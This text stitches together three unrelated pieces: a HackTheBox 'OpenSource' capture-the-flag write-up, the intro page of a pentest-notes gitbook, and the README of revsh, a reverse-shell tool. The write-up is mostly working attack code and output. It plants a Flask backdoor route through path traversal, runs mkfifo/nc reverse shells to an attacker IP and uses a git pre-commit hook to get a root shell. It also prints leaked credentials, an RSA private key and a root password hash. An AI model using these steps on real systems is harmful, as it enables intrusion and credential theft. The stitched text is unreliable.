On the file ```app/app/views.py``` we can see the following code:
```python
import os
from app.utils import get_file_name
from flask import render_template, request, send_file
from app import app
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
f = request.files['file']
file_name = get_file_name(f.filename)
file_path = os.path.join(os.getcwd(), "public", "uploads", file_name)
f.save(file_path)
return render_template('success.html', file_url=request.host_url + "uploads/" + file_name)
return render_template('upload.html')
@app.route('/uploads/<path:path>')
def send_report(path):
path = get_file_name(path)
return send_file(os.path.join(os.getcwd(), "public", "uploads", path))
```
```send_report``` function calls to ```get_file_name``` function (from ```utils```) and then sending a file from the web server.
Let's observe ```get_file_name``` function on ```app/app/utils.py```:
```python
import time
def current_milli_time():
return round(time.time() * 1000)
"""
Pass filename and return a secure version, which can then safely be stored on a regular file system.
"""
def get_file_name(unsafe_filename):
return recursive_replace(unsafe_filename, "../", "")
"""
TODO: get unique filename
"""
def get_unique_upload_name(unsafe_filename):
spl = unsafe_filename.rsplit("\\.", 1)
file_name = spl[0]
file_extension = spl[1]
return recursive_replace(file_name, "../", "") + "_" + str(current_milli_time()) + "." + file_extension
"""
Recursively replace a pattern in a string
"""
def recursive_replace(search, replace_me, with_me):
if replace_me not in search:
return search
return recursive_replace(search.replace(replace_me, with_me), replace_me, with_me)
```
We can see the ```get_file_name``` function calls to ```recursive_replace``` to replace all ```../``` with ```""``` to prevent directory traversal.
We can see on also ```.git``` directory, Let's see which branches we have:
```console
┌─[evyatar@parrot]─[/hackthebox/OpenSource/source]
└──╼ $ git branch
dev
* public
┌─[evyatar@parrot]─[/hackthebox/OpenSource/source]
└──╼ $ git log
commit 2c67a52253c6fe1f206ad82ba747e43208e8cfd9 (HEAD -> public)
Author: gituser <gituser@local>
Date: Thu Apr 28 13:55:55 2022 +0200
clean up dockerfile for production use
commit ee9d9f1ef9156c787d53074493e39ae364cd1e05
Author: gituser <gituser@local>
Date: Thu Apr 28 13:45:17 2022 +0200
initial
```
Let's check the ```dev``` branch:
```console
┌─[evyatar@parrot]─[/hackthebox/OpenSource/source]
└──╼ $ git checkout dev -f
Switched to branch 'dev'
┌─[evyatar@parrot]─[/hackthebox/OpenSource/source]
└──╼ $ git log
commit c41fedef2ec6df98735c11b2faf1e79ef492a0f3 (HEAD -> dev)
Author: gituser <gituser@local>
Date: Thu Apr 28 13:47:24 2022 +0200
commit c41fedef2ec6df98735c11b2faf1e79ef492a0f3 (HEAD -> dev)
Author: gituser <gituser@local>
Date: Thu Apr 28 13:47:24 2022 +0200
ease testing
commit be4da71987bbbc8fae7c961fb2de01ebd0be1997
Author: gituser <gituser@local>
Date: Thu Apr 28 13:46:54 2022 +0200
added gitignore
commit a76f8f75f7a4a12b706b0cf9c983796fa1985820
Author: gituser <gituser@local>
Date: Thu Apr 28 13:46:16 2022 +0200
updated
commit ee9d9f1ef9156c787d53074493e39ae364cd1e05
Author: gituser <gituser@local>
Date: Thu Apr 28 13:45:17 2022 +0200
initial
```
By enumerating the commits we found credentials on ```a76f8f75f7a4a12b706b0cf9c983796fa1985820```:
```console
┌─[evyatar@parrot]─[/hackthebox/OpenSource/source]
└──╼ $ git checkout a76f8f75f7a4a12b706b0cf9c983796fa1985820 -f
Note: switching to 'a76f8f75f7a4a12b706b0cf9c983796fa1985820'.
┌─[evyatar@parrot]─[/hackthebox/OpenSource/source]
└──╼ $ cat ./app/.vscode/settings.json
{
"python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python",
"http.proxy": "http://dev01:Soulless_Developer#2022@10.10.10.128:5187/",
"http.proxyStrictSSL": false
}
```
We can see the credentials ```dev01:Soulless_Developer#2022```.
According to the source code before, We can replace the file ```views.py``` with our file.
First, Let's create our ```views.py``` file with ```backdoor``` route:
```python
import os
from app.utils import get_file_name
from flask import render_template, request, send_file
from app import app
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
f = request.files['file']
file_name = get_file_name(f.filename)
file_path = os.path.join(os.getcwd(), "public", "uploads", file_name)
f.save(file_path)
return render_template('success.html', file_url=request.host_url + "uploads/" + file_name)
return render_template('upload.html')
@app.route('/uploads/<path:path>')
def send_report(path):
path = get_file_name(path)
return send_file(os.path.join(os.getcwd(), "public", "uploads", path))
@app.route('/bd')
def bd():
cmd=request.args.get('cmd')
return os.system(cmd)
```
Let's upload our ```views.py``` file on [http://10.10.11.164/upcloud](http://10.10.11.164/upcloud), We need to intercept the request using Burp to change the ```filename``` from ```filename="views.py"``` to ```filename="..//app/app/views.py"``` as follow:
```HTTP
POST /upcloud HTTP/1.1
Host: 10.10.11.164
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------23613858511082285195442481844
Content-Length: 1016
Origin: http://10.10.11.164
DNT: 1
Connection: close
Referer: http://10.10.11.164/upcloud
Upgrade-Insecure-Requests: 1
-----------------------------23613858511082285195442481844
Content-Disposition: form-data; name="file"; filename="views.py"
Content-Type: text/x-python
import os
from app.utils import get_file_name
from flask import render_template, request, send_file
from app import app
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
f = request.files['file']
file_name = get_file_name(f.filename)
file_path = os.path.join(os.getcwd(), "public", "uploads", file_name)
f.save(file_path)
return render_template('success.html', file_url=request.host_url + "uploads/" + file_name)
return render_template('upload.html')
@app.route('/uploads/<path:path>')
def send_report(path):
path = get_file_name(path)
return send_file(os.path.join(os.getcwd(), "public", "uploads", path))
@app.route('/bd')
def bd():
cmd=request.args.get('cmd')
return os.system(cmd)
-----------------------------23613858511082285195442481844--
```
Because ```recursive_replace``` function replaces ```../``` with ```""``` so ```filename="..//app/app/views.py"``` will be ```filename="/app/app/views.py"``` and thats exactly what we need.
Let's test our backdoor:
```console
┌─[evyatar@parrot]─[/hackthebox/OpenSource]
└──╼ $ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
```
Now, Let's send a PING request to our host by browsing to [http://10.10.11.164/bd?cmd=ping%20-c1%2010.10.14.14](http://10.10.11.164/bd?cmd=ping%20-c1%2010.10.14.14) and we get:
```console
┌─[evyatar@parrot]─[/hackthebox/OpenSource]
└──╼ $ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
13:35:26.577312 IP 10.10.14.14 > 10.10.11.164: ICMP echo reply, id 304, seq 14, length 64
13:35:27.581402 IP 10.10.11.164 > 10.10.14.14: ICMP echo request, id 304, seq 15, length 64
13:35:27.581466 IP 10.10.14.14 > 10.10.11.164: ICMP echo reply, id 304, seq 15, length 64
13:35:28.578196 IP 10.10.11.164 > 10.10.14.14: ICMP echo request, id 304, seq 16, length 64
13:35:28.578261 IP 10.10.14.14 > 10.10.11.164: ICMP echo reply, id 304, seq 16, length 64
```
Now we can get a reverse shell:
```console
┌─[evyatar@parrot]─[/hackthebox/OpenSource]
└──╼ $ sudo nc -lvp 4444
listening on [any] 4444 ...
```
Let's run the following command to get a reverse shell:
```console
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 4444 >/tmp/f
```
Endcode it:
```console
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff|%2Fbin%2Fsh%20-i%202%3E%261|nc%2010.10.14.14%2080%20%3E%2Ftmp%2Ff
```
And browse it using ```curl```:
```console
┌─[evyatar@parrot]─[/hackthebox/OpenSource]
└──╼ $ curl "http://10.10.11.164/bd?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff|%2Fbin%2Fsh%20-i%202%3E%261|nc%2010.10.14.14%204444%20%3E%2Ftmp%2Ff"
```
And we get:
```console
┌─[evyatar@parrot]─[/hackthebox/OpenSource]
└──╼ $ sudo nc -lvp 4444
listening on [any] 4444 ...
10.10.11.164: inverse host lookup failed: Unknown host
connect to [10.10.14.14] from (UNKNOWN) [10.10.11.164] 36871
/bin/sh: can't access tty; job control turned off
/app/app # whoami
root
```
As we can see, We are inside a container.
By running ```arp -a``` we get the following hosts:
```console
/app/app # ifconfig
ifconfig
eth0 Link encap:Ethernet HWaddr 02:42:AC:11:00:07
inet addr:172.17.0.7 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8277 errors:0 dropped:0 overruns:0 frame:0
TX packets:5125 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:9326470 (8.8 MiB) TX bytes:1194325 (1.1 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
/app/app # arp -a
? (172.17.0.6) at 02:42:ac:11:00:06 [ether] on eth0
? (172.17.0.9) at 02:42:ac:11:00:09 [ether] on eth0
? (172.17.0.1) at 02:42:f2:dd:9b:77 [ether] on eth0
```
We can see that we have the following hosts ```172.17.0.6,172.17.0.9,172.17.0.1```.
To make port scanning we need a tunnel, We can use [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel) which is a fast TCP/UDP tunnel, transported over HTTP.
Let's download the [https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz](https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz) version and upload it into the target machine.
In our host, Let's run:
```console
┌─[evyatar@parrot]─[/hackthebox/OpenSource]
└──╼ $ ./chisel server -p 4445 --reverse
2022/06/26 14:21:37 server: Reverse tunnelling enabled
2022/06/26 14:21:37 server: Fingerprint A3o69rYF7s9sPdbSaiyQ1IqhmCNONWLNt+tT3yxEY6M=
2022/06/26 14:21:37 server: Listening on http://0.0.0.0:4445
```
And on the target machine:
```console
/tmp # ./chisel client 10.10.14.14:4445 R:socks
2022/06/26 11:22:46 client: Connecting to ws://10.10.14.14:4445
2022/06/26 11:22:48 client: Connected (Latency 87.988274ms)
```
And we get session from the target machine:
```console
┌─[evyatar@parrot]─[/hackthebox/OpenSource]
└──╼ $ ./chisel server -p 4445 --reverse
...
2022/06/26 14:22:47 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
```
Let's configure the proxy on ```/etc/proxychains.conf```:
```console
...
[ProxyList]
socks4 127.0.0.1 1080
```
NOTE: You can read about chisel tunneling on [https://ap3x.github.io/posts/pivoting-with-chisel/](https://ap3x.github.io/posts/pivoting-with-chisel/).
On the ```nmap``` scanning we ran before we found port ```3000``` is open.
Let's try to find which container listens to this port:
```console
┌─[evyatar@parrot]─[/hackthebox/OpenSource]
└──╼ $ proxychains nc 172.17.0.1 3000 -z -v
ProxyChains-3.1 (http://proxychains.sf.net)
172.17.0.1: inverse host lookup failed:
|D-chain|-<>-127.0.0.1:1080-<><>-172.17.0.1:3000-<><>-OK
(UNKNOWN) [172.17.0.1] 3000 (?) open : Operation now in progress
┌─[evyatar@parrot]─[/hackthebox/OpenSource]
└──╼ $ proxychains nc 172.17.0.6 3000 -z -v
ProxyChains-3.1 (http://proxychains.sf.net)
172.17.0.6: inverse host lookup failed:
|D-chain|-<>-127.0.0.1:1080-<><>-172.17.0.6:3000-<--timeout
(UNKNOWN) [172.17.0.6] 3000 (?) : Connection refused
┌─[evyatar@parrot]─[/hackthebox/OpenSource]
└──╼ $ proxychains nc 172.17.0.9 3000 -z -v
ProxyChains-3.1 (http://proxychains.sf.net)
172.17.0.9: inverse host lookup failed:
|D-chain|-<>-127.0.0.1:1080-<><>-172.17.0.9:3000-<--timeout
(UNKNOWN) [172.17.0.9] 3000 (?) : Connection refused
```
We can see it's open on ```172.17.0.1```, Let's use ```proxychains``` to open firefox and to browse to [http://172.17.0.1:3000/](http://172.17.0.1:3000/):
![gitea.JPG](images/gitea.JPG)
Regiter on [http://172.17.0.1:3000/user/sign_up](http://172.17.0.1:3000/user/sign_up):
![register.JPG](images/register.JPG)
By clicking on [Explore->Users](http://172.17.0.1:3000/explore/users) we get:
![users.JPG](images/users.JPG)
By logging in to ```dev01``` user with the credentials from the ```dev``` branch (```dev01:Soulless_Developer#2022```) we get:
![dev01.JPG](images/dev01.JPG)
We can see ```.ssh``` directory on [http://172.17.0.1:3000/dev01/home-backup/src/branch/main/.ssh](http://172.17.0.1:3000/dev01/home-backup/src/branch/main/.ssh):
![ssh.JPG](images/ssh.JPG)
```id_rsa``` of ```dev01``` contains:
```console
-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----
```
Let's use ```dev01``` SSH private key:
```console
┌─[evyatar@parrot]─[/hackthebox/OpenSource]
└──╼ $ ssh -i dev01_idrsa dev01@10.10.11.164
load pubkey "dev01_idrsa": invalid format
The authenticity of host '10.10.11.164 (10.10.11.164)' can't be established.
ECDSA key fingerprint is SHA256:a6VljAI6pLD7/108ls+Bi5y88kWaYI6+V4lTU0KQsQU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.164' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-176-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Jun 26 19:50:24 UTC 2022
System load: 0.44 Processes: 241
Usage of /: 75.8% of 3.48GB Users logged in: 0
Memory usage: 26% IP address for eth0: 10.10.11.164
Swap usage: 0% IP address for docker0: 172.17.0.1
16 updates can be applied immediately.
9 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Last login: Mon May 16 13:13:33 2022 from 10.10.14.23
dev01@opensource:~$ cat user.txt
36195a91ae4e74463454c52888fe509
```
And we get the user flag ```36195a91ae4e74463454c52888fe509```.
### Root
Let's run [pspy64](https://github.com/DominicBreuker/pspy) to monitor the running processes.
After a few minutes we can see the following:
```console
...
2022/06/26 20:04:01 CMD: UID=0 PID=11375 | /bin/bash /root/meta/app/clean.sh
2022/06/26 20:04:01 CMD: UID=0 PID=11378 | git status --porcelain
2022/06/26 20:04:01 CMD: UID=0 PID=11386 | git commit -m Backup for 2022-06-26
2022/06/26 20:04:01 CMD: UID=0 PID=11387 | /bin/bash /usr/local/bin/git-sync
2022/06/26 20:04:01 CMD: UID=0 PID=11388 | git push origin main
...
```
We can see the root runs ```git commit``` command, We can use [Git Hooks](https://githooks.com/) to write ```pre-commit``` hook.
Every Git repository has a ```.git/hooks``` folder with a script for each hook we can bind to.
Let's add a pre-commit on ```/home/dev01/.git/hooks/pre-commit``` file (We can copy this file from ```/home/dev01/.git/hooks/pre-commit.sample```), We add ```ping``` command to POC:
```console
dev01@opensource:~/.git/hooks$ cat pre-commit
#!/bin/sh
ping -c1 10.10.16.5
```
And we get a ```ping```:
```console
┌─[evyatar@parrot]─[/hackthebox/OpenSource]
└──╼ $ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
23:14:01.486984 IP 10.10.11.164 > 10.10.14.14: ICMP echo request, id 14666, seq 1, length 64
23:14:01.487002 IP 10.10.14.14 > 10.10.11.164: ICMP echo reply, id 14666, seq 1, length 64
```
Now, Let's change the ```ping``` request to the following reverse shell:
```console
dev01@opensource:~/.git/hooks$ cat pre-commit
#!/bin/sh
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 4446 >/tmp/f
```
And we get a reverse shell:
```console
┌─[evyatar@parrot]─[/hackthebox/OpenSource]
└──╼ $ nc -lvp 4446
listening on [any] 4446 ...
10.10.11.164: inverse host lookup failed: Unknown host
connect to [10.10.14.14] from (UNKNOWN) [10.10.11.164] 47800
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# pwd
/home/dev01
# cat /root/root.txt
d44173e61ad006def4f2feb5a4c454dc
```
And we get the root flag ```d44173e61ad006def4f2feb5a4c454dc```.
PDF password:
```console
# cat /etc/shadow | grep root | cut -d':' -f2
$6$5sA85UVX$HupltM.bMqXkLc269pHDk1lryc4y5LV0FPMtT3x.yUdbe3mGziC8aUXWRQ2K3jX8mq5zItFAkAfDgPzH8EQ1C/
``` |
# Welcome to CSbyGB PenTips
![CSbyGB 🌟 "When you wonder, You're Learning" - Mister Rogers 🌟 ](https://csbygb.github.io/img/csbygb.png)
## $ whoami /priv
🏳 Ethical Hacker |🏆Award-winning Pentester | Artemis Red Team | Board Member | Speaker | Mentor 🏳️🌈
## What is this?
This is a gitbook with my pentest tips and notes from my learning journey as pentester (more than 400 pages to transfer here 😅).
It is a work in progress and it will be filled up asap with my notes and on the go as I learn new things everyday.
## Disclamer
❗🔴
**Everything used and mentioned here has to be used for an ETHICAL purpose, do not engage in any illegal activity using these resources**
❗🔴
## I won!!
**Thank you everyone for your support!! I won!!**
![Woman Hacker 2022](./.res/woman-hacker.jpeg)
## More about CSbyGB
- [CSbyGB - LinkTree](https://linktr.ee/csbygb)
- [CSbyGB - Blog](https://csbygb.github.io/)
## Credits
I took these notes while working but also when using different resources.
Here is a list :
- [XSSrat - Wesley Thijs - class prep for CNWPP](https://thexssrat.podia.com/view/courses/pentesting-101-the-ultimate-guide-from-start-to-finish-from-planning-to-reporting)
- [TCM-Security](https://academy.tcm-sec.com/)
- [Tryhackme](https://tryhackme.com/)
- [Hackthebox - Academy](https://academy.hackthebox.com/)
- [Hackthebox - Classic](https://www.hackthebox.com/)
- [Udemy](https://www.udemy.com/)
|
# revsh #
_revsh_ is a tool for establishing [reverse shells](http://en.wikipedia.org/wiki/Reverse_shell) with [terminal](http://en.wikipedia.org/wiki/Computer_terminal) support, reverse [VPNs](https://en.wikipedia.org/wiki/Virtual_private_network) for [advanced pivoting](https://en.wikipedia.org/wiki/Exploit_(computer_security)#Pivoting), as well as arbitrary data tunneling.
## News ##
* __2018-08-09__: New release. Mosly bug / stability fixes and better documentation on the build process with OpenSSL 1.1.0. See the _Installation_ section below for the updated build instructions.
## Overview ##
**What is a "reverse shell"?**
A reverse shell is a network connection that grants [shell](http://en.wikipedia.org/wiki/Shell_%28computing%29) access to a remote host. As opposed to other remote login tools such as [telnet](http://en.wikipedia.org/wiki/Telnet) and [ssh](http://en.wikipedia.org/wiki/Secure_Shell), a reverse shell is initiated by the remote host. This technique of connecting outbound from the remote network allows for circumvention of firewalls that are configured to block inbound connections only.
**What is a "reverse VPN"?**
_revsh_ is capable of attaching a virtual ethernet card (tun/tap) to both ends of its crypto tunnel. These cards can then be used to forward raw IP packets or ethernet frames. When combined with an Iptables NAT rule, or bridging a real ethernet card, this allows for the operator to receive a fully routable IP address on the target machines network. This, essentially, is a full VPN that has performed a connect-back call to the operator to circumvent in-bound packet filtering and grant the operator full network access. (See ["Documentation/REVERSE_VPN.md"](https://github.com/emptymonkey/revsh/blob/master/Documentation/REVERSE_VPN.md) for more information.)
**What is a "bind shell"?**
A [bind shell](http://en.wikipedia.org/wiki/Shellcode#Remote) is a shell that is served from a normal forward network connection. _revsh_ supports both reverse and bind shells. To invoke a bind shell you can either invoke the _-b_ flag on both ends of the connection, or invoke the binary as '_bindsh_'.
**Can't I just use [netcat](http://en.wikipedia.org/wiki/Netcat)?**
There are [many techniques](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) for establishing a reverse shell, but these methods don't provide terminal support. _revsh_ allows for a reverse shell whose connection is mediated by a [pseudo-terminal](http://en.wikipedia.org/wiki/Pseudoterminal), and thus allows for features such as:
* [job control](http://en.wikipedia.org/wiki/Job_control)
* [control character processing](http://en.wikipedia.org/wiki/Control_character) (e.g [Ctrl-C](http://en.wikipedia.org/wiki/Control-C))
* [auto-completion](http://en.wikipedia.org/wiki/Auto-completion)
* support for programs requiring a [controlling tty](https://github.com/emptymonkey/ctty) (e.g. vi)
* [processing of window re-size events](http://linux.die.net/man/4/tty_ioctl)
In addition, _revsh_ also offers the following features:
* [UTF-8](http://en.wikipedia.org/wiki/UTF-8) support.
* Circumvents [utmp / wtmp](http://en.wikipedia.org/wiki/Utmp). (No login recorded.)
* Processes [rc file](http://en.wikipedia.org/wiki/Run_commands) commands upon login for easy scripting.
* [OpenSSL](https://www.openssl.org/) encryption with key based authentication baked into the binary.
* Anonymous [Diffie-Hellman](http://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange) encryption upon request.
* Ephemeral Diffie-Hellman encryption as default. (Now with more [Perfect Forward Secrecy](http://en.wikipedia.org/wiki/Forward_secrecy)!)
* [Cert pinning](http://en.wikipedia.org/wiki/Transport_Layer_Security#Certificate_pinning) for protection against [sinkholes](http://en.wikipedia.org/wiki/DNS_sinkhole) and [mitm](http://en.wikipedia.org/wiki/Man-in-the-middle_attack) counter-intrusion.
* Connection timeout for remote process self-termination.
* Randomized retry timers for non-predictable auto-reconnection.
* Netcat style non-interactive data brokering for file transfer.
* Proxy support: point-to-point, SOCKS 4, SOCKS 4a, and SOCKS 5. Proxys are available in both directions for complete flexibility.
* TUN / TAP support for forwarding raw IP packets / Ethernet frames.
* Escape sequence commands to kill non-responsive nodes, or print connection statistics.
_revsh_ is intended as a supplementary tool for a [pentester's](http://en.wikipedia.org/wiki/Pentester) toolkit that provides the full set of terminal features across an encrypted tunnel.
**Where can I use _revsh_?**
_revsh_ was developed on x86_64 Linux. Here is a brief list of Arch / OS combinations that it has been used on:
* x86_64 Linux
* i686 Linux
* amd64 FreeBSD
(If you have successfully used revsh on another platform, drop me a line and I'll add it to the list.)
## Usage ##
empty@monkey:~$ revsh -h
Control: revsh -c [CONTROL_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]
Target: revsh [TARGET_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]
ADDRESS The address of the control listener. (Default is "0.0.0.0".)
PORT The port of the control listener. (Default is "2200".)
CONTROL_OPTIONS:
-c Run in "command and control" mode. (Default is target mode.)
-a Enable Anonymous Diffie-Hellman mode. (Default is Ephemeral Diffie-Hellman.)
-d KEYS_DIR Reference the keys in an alternate directory. (Default is "~/.revsh/keys/".)
-f RC_FILE Reference an alternate rc file. (Default is "~/.revsh/rc".)
-s SHELL Invoke SHELL as the remote shell. (Default is "/bin/bash".)
-F LOG_FILE Log general use and errors to LOG_FILE. (No default set.)
TARGET_OPTIONS:
-t SEC Set the connection timeout to SEC seconds. (Default is "3600".)
-r SEC1,SEC2 Set the retry time to be SEC1 seconds, or (Default is "600,1200".)
to be random in the range from SEC1 to SEC2.
MUTUAL_OPTIONS:
-k Run in keep-alive mode.
Node will neither exit normally, nor timeout.
-L [LHOST:]LPORT:RHOST:RPORT
Static socket forwarding with a local listener
at LHOST:LPORT forwarding to RHOST:RPORT.
-R [RHOST:]RPORT:LHOST:LPORT
Static socket forwarding with a remote listener
at RHOST:RPORT forwarding to LHOST:LPORT.
-D [LHOST:]LPORT
Dynamic socket forwarding with a local listener
at LHOST:LPORT. (Socks 4, 4a, and 5. TCP connect only.)
-B [RHOST:]RPORT
Dynamic socket forwarding with a remote
listener at LHOST:LPORT. (Socks 4, 4a, and 5. TCP connect only.)
